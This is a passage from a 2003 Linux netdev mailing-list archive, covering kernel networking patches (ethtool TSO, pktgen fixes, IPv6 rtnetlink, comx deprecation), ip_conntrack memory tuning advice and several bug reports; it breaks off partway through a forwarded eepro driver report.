Content-Transfer-Encoding: 7bit X-archive-position: 4164 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev Jim Keniston wrote: > James Morris wrote: > > > > On Thu, 17 Jul 2003, Jim Keniston wrote: > > > > > 3. Given the above, what should the evlog.c caller do when > > > kernel_error_event_iov() returns -EINPROGRESS? > > > a. Nothing. Figure the packet will probably get logged. > > > b. Just to be safe, report it via printk, the same way we report dropped > > > packets. > > > We currently do (a). (b) would mean that every event logged from IRQ > > > context would be cc-ed to printk. > > > > I don't think this irq detection logic should be added at all here, let > > the caller reschedule its logging if running in irq context. > > > > - James > > -- > > James Morris > > > > Yes, this makes sense. At the kerror.c level, just return -EDEADLK if in_irq(). > Delay packet delivery (via a tasklet, as before) at the evlog.c level instead. > That way, we know at the evlog.c level (in the tasklet) whether the event packet > was delivered to anybody, and can paraphrase it to printk if it wasn't. > > Is this the sort of thing you had in mind? > Jim K I implemented the above change. Now, an event logged from an interrupt handler when nobody's listening to our socket (e.g., during boot) is paraphrased to printk. Here are the updated patches: http://prdownloads.sourceforge.net/evlog/kerror-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/evlog-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/kerrord.tar.gz?download Jim K From dax@gurulabs.com Fri Jul 18 17:12:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 17:12:31 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J0CMFl028163 for ; Fri, 18 Jul 2003 17:12:22 -0700 Received: from dhcp9.hq.gurulabs.com (dhcp9.hq.gurulabs.com [10.1.2.9]) by mail.gurulabs.com (Postfix) with ESMTP id 4368777A0; Fri, 18 Jul 2003 18:12:21 -0600 (MDT) Subject: Memory usage/tuning for ip_conntrack From: Dax Kelson To: Martin Josefsson Cc: netdev@oss.sgi.com In-Reply-To: <1058563690.26030.23.camel@tux.rsn.bth.se> References: <1058558848.2674.88.camel@mentor.gurulabs.com> <1058563690.26030.23.camel@tux.rsn.bth.se> Content-Type: text/plain Message-Id: <1058573540.6491.18.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 18 Jul 2003 18:12:21 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4165 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev On Fri, 2003-07-18 at 15:28, Martin Josefsson wrote: > Increasing the number of buckets doesn't cost much memory compared to > the actual connections and it gives you a nice performanceboost if you > are trying to handle lots of connections. (the default is based on the > amount of memory in the machine and it's normally ok for desktop > machines and small servers/routers) I just wanted to followup publicly for archival purposes. OK, so getting more into the realm of "best practices", by default the maximum number of connections tracked will be 8x the number of buckets. The number of buckets is determined at boot time based on amount of ram (this in turns determines max connections that can be tracked -- (8 * buckets see above)). This is fine for desktop, small routers, etc. However, both numbers can be tuned independently of each other. On a box with lots of connections flowing through it (ie, a dedicated high volume NAT/firewall/router), you can get better performance if your max connections per bucket ratio is 2:1 instead of the default 8:1. On Red Hat Linux, to do this tuning, figure out how many maximum connections you want to track, divide this number in half (make sure it isn't a 2^n number on kernels < 2.4.21). This is how many buckets you should have. To configure your system with this many buckets, add the following lines to your /etc/modules.conf file: (The 44000 used below is just an example, estimate your worst case scenario and add 10% to it). # I want to have a 2:1 bucket to connection ratio for good performance # Since I want to have a maximum of 44000 connections tracked, I # set the number of buckets to 1/2 that value for a 2:1 ratio. options ip_conntrack hashsize=22000 Now by default you'll have 8 * 22000 this number of maximum connections which is much higher than the To readjust this down to the good 2:1 ratio add the following line to your /etc/sysctl.conf file: net.ipv4.ip_conntrack_max = 44000 Now to figure out maximum possible memory consumption, do the following: (memory used per buckets * number of buckets) + (memory used per tracked connection * maximum number of tracked connections) Memory used per bucket is 8 bytes on 32bit hardware, 16 bytes on 64bit hardware. To determine "memory used per tracked connection", run this command: grep ip_conntrack /proc/slabinfo | tr -s " " | cut -d " " -f 4 Did I miss anything or do you have anything to add Martin? Dax Kelson Guru Labs From scott.feldman@intel.com Fri Jul 18 20:00:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 20:00:19 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J30CFl001642 for ; Fri, 18 Jul 2003 20:00:13 -0700 Received: from talaria.sc.intel.com (talaria.sc.intel.com [10.3.253.5]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6J2wnT18361 for ; Sat, 19 Jul 2003 02:58:49 GMT Received: from fmsmsxvs043.fm.intel.com (fmsmsxvs043.fm.intel.com [132.233.42.129]) by talaria.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6J2s4f25284 for ; Sat, 19 Jul 2003 02:54:04 GMT Received: from [134.134.179.196] ([134.134.179.196]) by fmsmsxvs043.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071819570925516 ; Fri, 18 Jul 2003 19:57:09 -0700 Date: Fri, 18 Jul 2003 20:17:01 -0700 (PDT) From: "Feldman, Scott" X-X-Sender: scott.feldman@localhost.localdomain Reply-To: "Feldman, Scott" To: Jeff Garzik cc: davidm@hpl.hp.com, , "Feldman, Scott" Subject: [PATCH] add ethtool TSO get/set Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4166 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev * Add TSO get/set command to ethtool interface. Applies to both 2.4/2.5. Ethtool application patch sent under separate cover. --------------- --- linux-2.4.22-pre7/include/linux/ethtool.h.orig 2003-07-18 16:35:05.000000000 -0700 +++ linux-2.4.22-pre7/include/linux/ethtool.h 2003-07-18 16:37:35.000000000 -0700 @@ -281,6 +281,8 @@ #define ETHTOOL_GSTRINGS 0x0000001b /* get specified string set */ #define ETHTOOL_PHYS_ID 0x0000001c /* identify the NIC */ #define ETHTOOL_GSTATS 0x0000001d /* get NIC-specific statistics */ +#define ETHTOOL_GTSO 0x0000001e /* Get TSO enable (ethtool_value) */ +#define ETHTOOL_STSO 0x0000001f /* Set TSO enable (ethtool_value) */ /* compatibility with older code */ #define SPARC_ETH_GSET ETHTOOL_GSET From nalkunda@egr.msu.edu Fri Jul 18 21:29:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 21:29:25 -0700 (PDT) Received: from sys10.mail.msu.edu (sys10.mail.msu.edu [35.9.75.110]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J4TGFl005946 for ; Fri, 18 Jul 2003 21:29:17 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys10.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19divx-000MZz-00 for netdev@oss.sgi.com; Sat, 19 Jul 2003 00:02:57 -0400 Content-Type: text/plain; charset="us-ascii" From: N N Ashok Organization: CSE, Michigan State University To: netdev@oss.sgi.com Subject: Difference between (struct tc_stats) and (struct net_device_stats) Date: Fri, 18 Jul 2003 23:55:30 -0400 User-Agent: KMail/1.4.3 MIME-Version: 1.0 Message-Id: <200307182355.30867.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6J4TGFl005946 X-archive-position: 4167 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev Hi All, The tc_stats and net_device_stats are defined as below: struct tc_stats { __u64 bytes; /* NUmber of enqueues bytes */ __u32 packets; /* Number of enqueued packets */ __u32 drops; /* Packets dropped because of lack of resources */ __u32 overlimits; /* Number of throttle events when this }; struct net_device_stats { unsigned long rx_packets; /* total packets received */ unsigned long tx_packets; /* total packets transmitted */ unsigned long rx_bytes; /* total bytes received */ unsigned long tx_bytes; /* total bytes transmitted */ unsigned long rx_errors; /* bad packets received */ unsigned long tx_errors; /* packet transmit problems */ unsigned long rx_dropped; /* no space in linux buffers */ unsigned long tx_dropped; /* no space available in linux */ unsigned long multicast; /* multicast packets received */ unsigned long collisions; }; I add an estimator to one of my interfaces and if I observe, the bytes,packets in tc_stats for the estimator are not the same as rx_packets, rx_bytes of net_device_stats obtainted by get_stats(dev) of the same interface at almost the same time. Is there a difference in the meaning/range of the two structure fields? In net_device_stats, we have counts for drops, errors but no such fields for tc_stats. Are these counts also included in the bytes, packets fields of tc_stats? Thanks, Ashok From andersg@0x63.nu Fri Jul 18 23:47:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 23:48:02 -0700 (PDT) Received: from gagarin.0x63.nu (mail@h55p111.delphi.afb.lu.se [130.235.187.184]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J6lqFl011432 for ; Fri, 18 Jul 2003 23:47:55 -0700 Received: from andersg by gagarin.0x63.nu with local (Exim 3.36 #1 (Debian)) id 19dRod-0002yV-00; Fri, 18 Jul 2003 11:46:15 +0200 Date: Fri, 18 Jul 2003 11:46:15 +0200 To: "YOSHIFUJI Hideaki / ?$B5HF#1QL@" Cc: netdev@oss.sgi.com Subject: Re: OOPS in ip6_output2 Message-ID: <20030718094615.GD5964@h55p111.delphi.afb.lu.se> References: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> <20030718.114012.60686118.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030718.114012.60686118.yoshfuji@linux-ipv6.org> User-Agent: Mutt/1.5.4i From: Anders Gustafsson X-Scanner: exiscan *19dRod-0002yV-00*4fMG.NzuwMQ*0x63.nu X-archive-position: 4168 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andersg@0x63.nu Precedence: bulk X-list: netdev On Fri, Jul 18, 2003 at 11:40:12AM +0200, YOSHIFUJI Hideaki / ?$B5HF#1QL@ wrote: > In article <20030717151354.GA10640@h55p111.delphi.afb.lu.se> (at Thu, 17 Jul 2003 17:13:54 +0200), Anders Gustafsson says: > > > I don't follow netdev so maybe this is old stuff, but I got this oops when > > trying to ssh to a ipv6-host. > > What version are you using? > (Current tree may have fix for this.) > Thanks. Latest bk as of wednesday I think. It did just happen once in that kernel, so I don't really know if it's solved in latest bk which I run now. -- Anders Gustafsson - andersg@0x63.nu - http://0x63.nu/ From davem@redhat.com Fri Jul 18 23:51:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 23:51:56 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J6pqFl011871 for ; Fri, 18 Jul 2003 23:51:52 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA29798; Fri, 18 Jul 2003 23:41:10 -0700 Date: Fri, 18 Jul 2003 23:41:10 -0700 From: "David S. Miller" To: kuznet@ms2.inr.ac.ru Cc: pekkas@netcore.fi, mika.liljeberg@welho.com, jmorris@redhat.com, netdev@oss.sgi.com, dlstevens@us.ibm.com Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast Message-Id: <20030718234110.75ead085.davem@redhat.com> In-Reply-To: <200307172052.AAA15032@dub.inr.ac.ru> References: <200307172052.AAA15032@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4169 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 00:52:03 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > Done, the patch enclosed. Applied, thanks everyone. From davem@redhat.com Fri Jul 18 23:58:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 23:58:06 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J6w2Fl012392 for ; Fri, 18 Jul 2003 23:58:02 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA29820; Fri, 18 Jul 2003 23:47:30 -0700 Date: Fri, 18 Jul 2003 23:47:30 -0700 From: "David S. Miller" To: Krishna Kumar Cc: yoshfuji@linux-ipv6.org, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, linux-net@vger.kernel.org, krkumar@us.ibm.com Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 Message-Id: <20030718234730.2043bc1f.davem@redhat.com> In-Reply-To: References: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4170 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 17:37:18 -0700 (PDT) Krishna Kumar wrote: > > Yes, please split up the patch. > > Following is the split patch for prefix list and O/M flags. Alexey, others, please tell me if I should apply these two patches. Thanks. From yoshfuji@linux-ipv6.org Sat Jul 19 00:31:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 00:31:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J7VfFl014006 for ; Sat, 19 Jul 2003 00:31:42 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6J7XHBo022008; Sat, 19 Jul 2003 16:33:18 +0900 Date: Sat, 19 Jul 2003 09:33:16 +0200 (CEST) Message-Id: <20030719.093316.45294671.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4171 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Thu, 17 Jul 2003 17:37:18 -0700 (PDT)), Krishna Kumar says: > > Anyway, it seems we're reaching consensus. > > Great! Glad we have reached consensus because I am exhausted! Since you > have agreed to the above proposal, the prefix list patch has to be applied > before the O/M flags patch. I have kept the RTM_GETLNKINFO and specified > a new option to get the flags information, this can be extended later to > add more options for other paramters. We're reaching consensus, but hot have reached. :-p First part (prefixlist) seems ok to me. Second part does not. > -------- Patch for O/M flags against 2.5.73 (dependent on previous patch ----- > diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h > --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 > +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-17 16:57:52.000000000 -0700 > @@ -47,7 +47,9 @@ > #define RTM_DELTFILTER (RTM_BASE+29) > #define RTM_GETTFILTER (RTM_BASE+30) > > -#define RTM_MAX (RTM_BASE+31) > +#define RTM_GETLNKINFO (RTM_BASE+34) > + > +#define RTM_MAX (RTM_GETLNKINFO+1) > > /* > Generic structure for encapsulation of optional route information. This is what we don't have consensus. We need to decide whether to create new RTM_xxxIFACE or to reuse RTM_xxxLINK (and activate ifi_family :-)). > @@ -61,6 +63,13 @@ > unsigned short rta_type; > }; > > +/* Structure to return per interface device flags */ > +struct ifp_if6info > +{ > + int ifindex; > + int flags; > +}; > + > /* Macros to handle rtattributes */ > > #define RTA_ALIGNTO 4 ditto. > @@ -331,6 +340,7 @@ > IFA_LABEL, > IFA_BROADCAST, > IFA_ANYCAST, > + IFA_IFFLAGS, > IFA_CACHEINFO > }; Don't change values. > diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c > --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 > +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 > @@ -2451,6 +2451,43 @@ > netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); > } > > +int inet6_dump_linkinfo(struct sk_buff *skb, struct netlink_callback *cb) > +{ > + int ifindex, flags; > + struct net_device *dev; : > static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { > [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, > [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, > @@ -2459,6 +2496,7 @@ > [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, > [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, > .dumpit = inet6_dump_fib, }, > + [RTM_GETLNKINFO - RTM_BASE] = {.dumpit = inet6_dump_linkinfo, }, > }; > same as first comment for this part. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From gorgo@bpdcad01.bpdc.broadband.hu Sat Jul 19 01:14:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 01:14:24 -0700 (PDT) Received: from bpdcad01.bpdc.broadband.hu (bpdcad01.bpdc.broadband.hu [195.184.180.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J8E6Fl015846 for ; Sat, 19 Jul 2003 01:14:12 -0700 Received: by bpdcad01.bpdc.broadband.hu (Postfix, from userid 1000) id 289361C099; Sat, 19 Jul 2003 10:14:00 +0200 (CEST) Date: Sat, 19 Jul 2003 10:14:00 +0200 From: Gergely Madarasz To: Stephen Hemminger Cc: Jeff Garzik , Gergely Madarasz , netdev@oss.sgi.com, don@itc.hu Subject: Re: comx drivers in 2.6 Message-ID: <20030719081400.GP1553@bpdcad01.bpdc.broadband.hu> References: <20030717163337.78d123c0.shemminger@osdl.org> <3F173458.6060405@pobox.com> <20030718123625.6f8ae9b9.shemminger@osdl.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030718123625.6f8ae9b9.shemminger@osdl.org> User-Agent: Mutt/1.3.28i X-archive-position: 4172 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gorgo@thunderchild.debian.net Precedence: bulk X-list: netdev On Fri, Jul 18, 2003 at 12:36:25PM -0700, Stephen Hemminger wrote: > On Thu, 17 Jul 2003 19:42:16 -0400 > Jeff Garzik wrote: > > > Stephen Hemminger wrote: > > > It looks like the comx drivers never got updated for 2.5/2.6. Some > > > obvious issues are: > > > - lots of use of /proc files without setting the owner field. > > > - still using cli/sti > > > - no SMP locking on the linked list (which could be changed to list macros) > > > of hardware and protocols. > > > > > > Just bumped into this while trying to inspect for all the last possible > > > broken usage of net_device structure. It is too far behind to address > > > those issues. > > > > > > Submit a patch to mark these CONFIG_OBSOLETE. AFAIK nobody has cared > > for most of them since 2.2... (munich is an exception) > > > > diff -Nru a/drivers/net/wan/Kconfig b/drivers/net/wan/Kconfig > --- a/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 > +++ b/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 > @@ -60,9 +60,10 @@ > # > # COMX drivers > # > +# Not updated to 2.6. > config COMX > tristate "MultiGate (COMX) synchronous serial boards support" > - depends on WAN && (ISA || PCI) > + depends on WAN && (ISA || PCI) && OBSOLETE > ---help--- > Say Y if you want to use any board from the MultiGate (COMX) family. > These boards are synchronous serial adapters for the PC, Please add the following patch too. I'm suprised I'm still not removed from the maintainers file, though I have left itc almost two years ago. --- MAINTAINERS~ Mon Jul 14 05:35:12 2003 +++ MAINTAINERS Sat Jul 19 10:12:14 2003 @@ -420,8 +420,8 @@ S: Supported COMX/MULTIGATE SYNC SERIAL DRIVERS -P: Gergely Madarasz -M: Gergely Madarasz +P: Pasztor Szilard +M: Pasztor Szilard S: Supported COSA/SRP SYNC SERIAL DRIVER -- Madarasz Gergely gorgo@thunderchild.debian.net gorgo@linux.rulez.org It's practically impossible to look at a penguin and feel angry. Egy pingvinre gyakorlatilag lehetetlen haragosan nezni. From sneakums@zork.net Sat Jul 19 06:40:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 06:40:59 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JDeoFl000622 for ; Sat, 19 Jul 2003 06:40:50 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19drxB-00086I-00; Sat, 19 Jul 2003 06:40:49 -0700 To: netdev@oss.sgi.com Cc: linux-kernel@vger.kernel.org Subject: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds From: Sean Neakums Mail-Followup-To: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Date: Sat, 19 Jul 2003 14:40:48 +0100 Message-ID: <6uk7aeab33.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4173 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev I've just set up transport mode IPsec between two machines with the aid of the LARTC IPsec docs. Both boxes are running 2.6.0-test1-mm1, with a wireless/wired bridge between, using ipsec-tools 0.2.2. Everything seems to be in order, except (big except) that TCP sessions hang after a small number of seconds of use, usually between ten and twenty. The problem seems unrelated to the amount of data transferred; I've tried both bulk rsync transfers and ssh sessions. I've also tested the same boxes over 100baseT; still happens. I'm not exactly sure what additional information to supply; my experience with IPsec is limited to this past few hours' experimentation. From Robert.Olsson@data.slu.se Sat Jul 19 09:33:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 09:33:50 -0700 (PDT) Received: from robur.slu.se (robur.slu.se [130.238.98.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JGXdFl008977 for ; Sat, 19 Jul 2003 09:33:40 -0700 Received: (from robert@localhost) by robur.slu.se (8.9.3p2/8.9.3) id SAA07679; Sat, 19 Jul 2003 18:32:33 +0200 From: Robert Olsson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16153.29344.964485.457389@robur.slu.se> Date: Sat, 19 Jul 2003 18:32:32 +0200 To: "Kambo Lohan" Cc: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: PATCH pktgen hang, memleak, fixes In-Reply-To: References: X-Mailer: VM 6.92 under Emacs 19.34.1 X-archive-position: 4174 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Robert.Olsson@data.slu.se Precedence: bulk X-list: netdev Thanks! It looks fine. Jeff cross-posted to netdev which is the appropriate list. It goes for both 2.4 and 2.5 versions. We ask DaveM to apply. Cheers. --ro Kambo Lohan writes: > This should fix about 3 things. My first patch, be gentle... > > 2.5 has the same problem but I do not know if this will apply or not, we run > 2.4. --- linux/net/core/pktgen.c.orig Thu Jul 17 16:00:14 2003 +++ linux/net/core/pktgen.c Thu Jul 17 16:37:21 2003 @@ -47,6 +47,9 @@ * Also moved to /proc/net/pktgen/ * --ro * + * Fix refcount off by one if first packet fails, potential null deref, + * memleak 030710- KJP + * * See Documentation/networking/pktgen.txt for how to use this. */ @@ -85,9 +88,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -611,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -632,6 +634,7 @@ last_ok = 0; } else { + atomic_inc(&skb->users); last_ok = 1; info->sofar++; info->seq_num++; @@ -729,7 +732,9 @@ (unsigned long long) info->errors ); } - + + kfree_skb(skb); + out_reldev: if (odev) { dev_put(odev); From alan@lxorguk.ukuu.org.uk Sat Jul 19 10:08:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 10:08:27 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (pc2-cwma1-4-cust86.swan.cable.ntl.com [213.105.254.86]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JH8EFl011125 for ; Sat, 19 Jul 2003 10:08:15 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6JH5kKd022265 for ; Sat, 19 Jul 2003 18:05:47 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6JH5ksb022263 for netdev@oss.sgi.com; Sat, 19 Jul 2003 18:05:46 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: [Fwd: kernel 2.4.21] From: Alan Cox To: netdev@oss.sgi.com Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 19 Jul 2003 18:05:45 +0100 X-archive-position: 4175 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev -----Forwarded Message----- > From: Cedric Gavage > To: linux-kernel@vger.kernel.org > Subject: kernel 2.4.21 > Date: 19 Jul 2003 16:38:11 +0200 > > Hi all, > > I have a little question... > > > Summary of changes from v2.4.21-pre4 to v2.4.21-pre5 > ============================================ > > Alan Cox : > o ACPI apparently wasnt bios > o fix wrong date in microcode comment > o add another legitimate P4 type > o must disallow write combine on 450NX > o add framework for ndelay (nanoseconds) > o first block of parisc resend > o second block of parisc merge > o third block of parisc merge > o Ian Nelson moved > o update videobook docs to avoid check_region > o docs for IPMI > o remove dead init call > o add AMD hammer rng > o IPMI driver updates > o keyboard changes > o fix wrong test in raw driver > o fix paths for ide > o clarify hpt37x config > o fix more ide paths > o Paul's fix to do ide_cs handling in task context > o more ide paths > o fix use of check_region in umc driver > o more ide comment/doc info updates > o promise printk cleanups > o another wrong path > o IDE printk/cleanup bits > o fix padding on eepro driver > > In this patch, is it possible that there is a problem in the fix of > eepro driver? Since I upgrade the kernel with 2.4.20-8 (kernel-source > tag in debian) which include this patch I have some problem with packets > which are sometimes truncated... (the server runs an ircd and the result > is a delink). > > Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 06:31:00 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t 